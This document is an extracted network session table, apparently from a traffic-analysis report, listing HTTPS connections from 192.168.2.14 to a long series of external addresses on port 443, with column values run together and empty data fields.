                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22974192.168.2.144446888.120.128.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22975192.168.2.143689081.116.88.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22976192.168.2.1441642173.213.189.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22977192.168.2.1447422165.110.87.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22978192.168.2.1445464128.130.66.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22979192.168.2.1452260193.212.92.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22980192.168.2.1433492142.137.27.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22981192.168.2.146064073.38.48.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22982192.168.2.144724465.194.242.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22983192.168.2.144651212.224.223.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22984192.168.2.1454636135.71.64.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22985192.168.2.1449200121.122.90.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22986192.168.2.1445640200.214.255.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22987192.168.2.144728654.63.214.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22988192.168.2.1452340221.145.90.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22989192.168.2.1440560195.247.16.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22990192.168.2.144788258.203.99.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22991192.168.2.143759293.121.15.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22992192.168.2.1439920192.147.245.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22993192.168.2.144886083.25.163.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22994192.168.2.145456242.59.125.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22995192.168.2.1452730167.186.191.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22996192.168.2.1448778146.181.248.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22997192.168.2.1448046184.28.183.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22998192.168.2.143916832.20.201.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22999192.168.2.1445518113.139.132.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23000192.168.2.144635283.24.207.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23001192.168.2.1448470188.53.101.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23002192.168.2.144890676.106.93.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23003192.168.2.1438222112.246.33.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23004192.168.2.145283869.179.171.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23005192.168.2.1440202178.120.56.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23006192.168.2.143333260.12.208.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23007192.168.2.1440848102.19.186.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23008192.168.2.144339479.215.160.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23009192.168.2.1452910107.119.20.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23010192.168.2.145611424.189.30.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23011192.168.2.143646446.70.133.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23012192.168.2.145974448.103.118.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23013192.168.2.1455154181.30.201.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23014192.168.2.1456488130.245.161.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23015192.168.2.1450138186.118.27.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23016192.168.2.1445818178.62.141.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23017192.168.2.1432944152.75.50.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23018192.168.2.1460716195.173.114.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23019192.168.2.143593074.112.225.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23020192.168.2.1457718169.131.195.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23021192.168.2.145554889.35.123.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23022192.168.2.1445868172.110.129.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23023192.168.2.145844414.148.36.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23024192.168.2.145426692.46.22.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23025192.168.2.144403479.53.234.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23026192.168.2.1442028130.253.42.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23027192.168.2.1441392149.250.27.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23028192.168.2.143930653.73.181.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23029192.168.2.1441842128.139.8.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23030192.168.2.14374142.47.19.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23031192.168.2.1457908181.69.25.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23032192.168.2.1434094158.148.62.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23033192.168.2.144795689.5.103.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23034192.168.2.14495982.13.159.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23035192.168.2.144005831.112.208.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23036192.168.2.14449242.41.244.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23037192.168.2.1453456193.112.154.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23038192.168.2.1442418166.246.254.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23039192.168.2.1450014101.153.16.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23040192.168.2.1440392142.67.46.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23041192.168.2.1438030210.56.68.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23042192.168.2.1459204187.149.166.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23043192.168.2.144686640.24.208.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23044192.168.2.145770858.254.17.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23045192.168.2.143651243.131.254.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23046192.168.2.144437063.41.242.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23047192.168.2.1456440114.83.78.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23048192.168.2.1447522155.203.91.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23049192.168.2.1452568165.209.30.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23050192.168.2.145421620.0.246.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23051192.168.2.144495431.219.129.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23052192.168.2.1450056213.16.89.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23053192.168.2.1452910150.164.161.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23054192.168.2.1458630148.118.97.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23055192.168.2.1456612164.203.179.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23056192.168.2.145905027.154.21.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23057192.168.2.145721261.223.13.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23058192.168.2.145171017.31.227.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23059192.168.2.143684827.41.45.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23060192.168.2.145528484.170.142.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23061192.168.2.1451062115.103.100.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23062192.168.2.1445376220.223.219.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23063192.168.2.1444018209.185.222.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23064192.168.2.1439672217.122.161.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23065192.168.2.144479499.194.198.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23066192.168.2.1456134197.242.135.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23067192.168.2.144384447.104.231.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23068192.168.2.1445918187.15.0.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23069192.168.2.1453704163.59.251.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23070192.168.2.1445250184.120.182.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23071192.168.2.1437824124.127.91.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23072192.168.2.14492748.254.225.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23073192.168.2.1442328205.251.254.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23074192.168.2.143890054.221.221.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23075192.168.2.1453896191.83.231.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23076192.168.2.1450234167.59.90.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23077192.168.2.145995414.158.126.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23078192.168.2.1451584158.60.236.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23079192.168.2.144509864.129.211.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23080192.168.2.145059631.68.91.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23081192.168.2.144246031.112.72.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23082192.168.2.1446288150.77.146.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23083192.168.2.1440056119.119.177.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23084192.168.2.143455619.87.6.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23085192.168.2.1436642155.84.107.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23086192.168.2.1433830203.5.151.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23087192.168.2.144227436.15.38.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23088192.168.2.144724458.107.180.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23089192.168.2.143439260.9.227.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23090192.168.2.145940074.95.116.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23091192.168.2.1452368198.93.86.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23092192.168.2.1458788188.69.59.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23093192.168.2.1456188196.154.63.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23094192.168.2.144115871.99.117.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23095192.168.2.1445622211.75.151.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23096192.168.2.1457498134.73.53.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23097192.168.2.143612634.215.179.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23098192.168.2.1454144207.119.180.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23099192.168.2.144757658.78.230.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23100192.168.2.1446964220.192.248.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23101192.168.2.144262083.92.1.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23102192.168.2.143418887.254.225.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23103192.168.2.1449298122.202.107.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23104192.168.2.1453334176.90.172.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23105192.168.2.1455844207.97.136.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23106192.168.2.1450340177.51.122.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23107192.168.2.1451962187.138.222.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23108192.168.2.144183075.234.173.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23109192.168.2.144747049.216.26.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23110192.168.2.145774496.202.231.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23111192.168.2.1437028177.118.117.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23112192.168.2.1433622169.172.189.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23113192.168.2.1456104106.241.184.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23114192.168.2.1434738168.162.115.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23115192.168.2.145420640.0.49.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23116192.168.2.143777232.252.170.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23117192.168.2.1443030196.5.123.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23118192.168.2.1455090165.20.192.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23119192.168.2.146050418.22.181.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23120192.168.2.1454600222.131.182.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23121192.168.2.1433118221.10.176.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23122192.168.2.1447450103.76.97.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23123192.168.2.145461023.137.17.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23124192.168.2.1434934175.108.86.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23125192.168.2.145479058.82.16.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23126192.168.2.1458796201.45.205.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23127192.168.2.1445584218.92.26.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23128192.168.2.143525474.178.255.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23129192.168.2.1435738145.10.218.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23130192.168.2.1450058123.92.49.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23131192.168.2.1453320205.169.239.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23132192.168.2.1447510145.45.229.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23133192.168.2.1446746222.10.216.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23134192.168.2.143786091.11.72.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23135192.168.2.1446550175.232.195.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23136192.168.2.144179441.218.145.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23137192.168.2.1452070185.57.101.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23138192.168.2.145676477.108.154.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23139192.168.2.143680440.113.33.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23140192.168.2.143784423.199.36.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23141192.168.2.145589240.54.159.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23142192.168.2.14445949.8.158.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23143192.168.2.143438466.178.218.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23144192.168.2.146089634.22.108.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23145192.168.2.1440854195.26.2.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23146192.168.2.1434280202.125.9.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23147192.168.2.1457374147.85.24.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23148192.168.2.1448044223.128.97.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23149192.168.2.1445664213.6.56.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23150192.168.2.144370414.91.97.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23151192.168.2.146048871.197.199.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23152192.168.2.1459198175.27.137.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23153192.168.2.1441038108.120.244.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23154192.168.2.1457772128.152.121.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23155192.168.2.143463267.40.229.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23156192.168.2.1440754107.40.120.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23157192.168.2.1450760142.85.90.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23158192.168.2.143393879.181.1.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23159192.168.2.145786075.140.65.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23160192.168.2.1434138130.207.118.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23161192.168.2.1442498150.55.57.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23162192.168.2.1436618124.106.104.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23163192.168.2.143877683.219.10.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23164192.168.2.145087081.37.251.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23165192.168.2.1448808112.45.39.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23166192.168.2.14557722.80.41.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23167192.168.2.1453428201.84.19.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23168192.168.2.1459008124.53.243.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23169192.168.2.1446098104.133.49.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23170192.168.2.143928842.222.224.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23171192.168.2.1453332204.112.196.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23172192.168.2.1460368160.102.73.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23173192.168.2.1434150168.81.93.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23174192.168.2.143986695.141.126.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23175192.168.2.1441496176.121.217.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23176192.168.2.145380272.134.65.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23177192.168.2.1452996185.143.250.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23178192.168.2.143518646.107.153.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23179192.168.2.1450432116.186.253.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23180192.168.2.144997665.219.77.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23181192.168.2.1434858143.230.116.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23182192.168.2.143713096.120.202.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23183192.168.2.1453690220.247.2.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23184192.168.2.1448240220.6.48.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23185192.168.2.145774887.181.185.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23186192.168.2.14374542.196.35.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23187192.168.2.1450280153.56.228.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23188192.168.2.1453640206.252.50.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23189192.168.2.144203020.76.51.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23190192.168.2.143570247.136.215.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23191192.168.2.1459650143.208.194.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23192192.168.2.1451100125.234.105.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23193192.168.2.144511058.205.237.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23194192.168.2.1437698220.141.213.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      23195192.168.2.1457670148.64.66.25443
                                      TimestampBytes transferredDirectionData

